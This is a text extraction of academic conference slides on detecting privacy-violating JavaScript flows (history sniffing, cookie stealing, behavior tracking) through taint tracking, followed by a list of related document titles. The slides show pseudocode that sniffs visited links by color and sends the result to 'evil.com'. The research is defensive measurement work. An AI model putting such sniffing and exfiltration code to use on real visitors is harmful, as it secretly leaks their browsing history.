document.location ✗ Location Hijacking Phishing

An Empirical Study ofPrivacy-Violating Information Flows

In JavaScript Web Applications

Dongseok Jang Ranjit Jhala Sorin Lerner Hovav Shacham

UC San Diego

document.location

✗ Location HijackingPhishing

document.cookie

Identity Theft✗ Cookie Stealing

✗ History Sniffing

JavaScriptVisited

Not-Visited

See absolutely everything visitors do on your webpage. …

Behavior Tracking✗

Plenty of Mischief Possible!

How Prevalent Are Malicious Flows?

How to Detect Malicious Flows?

MotivationFlow Policies

Dynamic Flow TrackingFlows in the Wild

Conclusions

Flow Policies

Specify different types of flows

Policies:History Sniffing

1. Create (invisible) link to a.com color depends on history

2. Inspect link’s color style property color says if link was visited

3. Send sniffed info over network

Policies:History Sniffing link = createLink(“facebook.com”); style = doc.getStyle(link);

visited = style.color==“purple”;

send(“evil.com”,“facebook=” + visited);

Inject Taints(At confidential sources)

link = createLink(“facebook.com”); style = doc.getStyle(link);

doc.getStyle(link);

Propagate Taints(At assignments, etc.)

doc.getStyle(link);

visited style.color==“purple”style.color==“purple”;

send(“evil.com”,“facebook=” + visited); “cr=” +

Block Taints(At untrusted sinks)

Flow Policies

Inject Block

Flow Policies

at doc.getStyle($1) if isLink($1)inject “secret”

Taint style with “secret”

Inject Block

Flow Policies

Inject Block

Flow Policies

at send($1, $2)block “secret” on $2

Block tainted values to third-party

Inject Block

Flow Policies

Inject Blockat Site if Cond inject Taint

at Site block Taint on Param

Flow Policies

ExpressiveHistory Sniffing

Behavior TrackingCookie Stealing

Location Hijacking…

Conclusions

Dynamic Flow TrackingRewrite JS code to carry taints

Parse ExecuteSourcecode AST Rewrite AST

Dynamic Eval

[Chander et al POPL 07]

Add .taint fields

Dynamic Eval

Inject, Propagate, Block Taints

Rewritten Code

Rewriting Issues

Boxing / UnboxingIndirect Flows

Dynamic Eval

Rewriting Issues

Boxing / UnboxingIndirect Flows

Dynamic Eval

Dynamic Flow TrackingRewrite JS code to carry taints

Dynamic Eval

Implemented in Chrome/V8

Dynamic Flow TrackingPerformance (Overhead)

Performance: Policies

Cookie Confidentialitycookie doesn’t flow to 3rd party

codeLocation Integrity

location unaffected by 3rd party code

Performance: Benchmark

10 sites with the largest JS code base in Alexa top 100

15 – 31 Kloc (avg. 21Kloc)

Performance: Figures

Timing OverheadsPage load (avg: 2x) JS execution (avg: 3x)

Performance: Upshot

High for online useAcceptable for offline survey

Conclusions

Flows “In the Wild”

History Sniffing

Behavior Tracking

History Sniffing: Figures

Alexa Top 50,000 sites

63 sites reported as sending history over network

1 site in Alexa Top 100

46 sites were real cases

Encrypted URLs

Decrypt URLCreate Link

Inspect Color

History Sniffing: Example

1 site in Alexa Top 100

History Sniffing: Real CasesRank Site Desc Src Inspected URLs61 youporn adult youporn pornhub,tube8,+ 21867 charter.net news interclick cars,edmunds,+462333 feedjit traffic feedjit twitter,facebook,+62415 gamestorrents game meaningtool amazon,ebay,+2202811 newsmax news interclick cars,edmunds,+463508 namepros forum feedjit twitter,facebook,+63603 fulltono music meaningtool amazon,ebay,+2204266 youporngay adult youporngay pornhub,tube8,+ 214581 osdir tech interclick cars,edmunds,+465233 gamesfreak game interclick cars,edmunds,+46

+ 36 more cases…

doubleclick.net

charter.net doubleclick.net interclick

+ 36 more cases…

gamestorrents harrenmedianetwork meaningtool

History Sniffing: Upshot

# of sniffed URLs: 8 to 22246 of real cases

39 had third-party sniffing code7 had home-grown code

Obfuscated sniffing codeCode was generated at runtime

Malicious Flows “In the Wild”

History Hijacking

Behavior Tracking

Log user behavior by JS event handlers

Send log back to website

Behavior Tracking: Policywhile(1){ e = getEvent(); if (e.isMouseOver()) onMouseOver(e); if (e.isClick()) onClick(e); ...}onMouseOver = function(event) isMouseOver = true;}

Behavior Tracking: Policy

at $1.isMouseOver() inject “secret”at $1.isClick() inject “secret”…

while(1){ e = getEvent(); if (e.isMouseOver()) onMouseOver(e); if (e.isClick()) onClick(e); ...}

e.isMouseOver()

Behavior Tracking: Figures

Alexa Top 1300 sites328 sites sent behavior115 sites sent behavior covertly10 sampled for manual inspection7 manually reconstructed flow

Automatically trigger JS event handlersMany user-visible (image swapping)

Covert Filter: response < 100 bytes

Behavior Tracking: Real CasesRank Site Desc Events3 youtube media click11 yahoo.co.jp portal click15 sina.com.cn portal click19 microsoft software click,mouseover34 mail.ru email click53 soso search click65 about search click

webtrends.com

Conclusions

ConclusionsFlows Occur In The WildReal cases for further study

Dynamic Approach is RequiredObfuscated & dynamically generated

Future workLarger Scale Study on Flows

Deeper crawl & other types of flow

Bullet-proof Protection ToolPolicy enforcement without

much slowdown & many false-alarms

Thank you!

document.location ✗ Location Hijacking Phishing

Documents

The MITRE Corporation · Hijacking DLL Search Order Hijacking Dylib Hijacking External Remote Services File System Permissions Weakness Hidden Files and Directories Hooking Aypervisor

Brand Hijacking

BGP Hijacking - 情報セキュリティ株式会社 · BGP hijacking 4 •BGP hijacking (sometimes referred to as prefix hijacking, route hijacking or IP hijacking) is the illegitimate

Dll Hijacking

Session Hijacking

DNS hijacking using

11 Session Hijacking

Session Hijacking ppt

Token Hijacking

Air plane hijacking

Prefix Hijacking Mitigation

Hijacking God’s Plan

Cover Sheet: Request 11460fora.aa.ufl.edu/docs/47/16May17/16May_EEL4XXX_XLayered_Sys_Se… · Attacks on clients (session hijacking, phishing, privacy attacks, cross-site scripting

Control Hijacking: Defenses

TCP-IP Hijacking · PDF fileTCP/IP Hijacking @ TCP/IP hijacking is a hacking technique that ... @ To launch a TCP/IP hijacking attack, the hacker must be on the same network as the

Invisible Hijacking

Hijacking bluetooth headsets

Phishing & Spear Phishing - info.vadesecure.com Marketing Website... · Phishing Spear Phishing Understanding an Emerging Threat to Healthcare Organizations 5 vadesecure.com How Phishing

Ethical Hacking Module X Session Hijacking. EC-Council Module Objective Spoofing Vs Hijacking Types of session hijacking TCP/IP concepts Performing Sequence

Drone Hijacking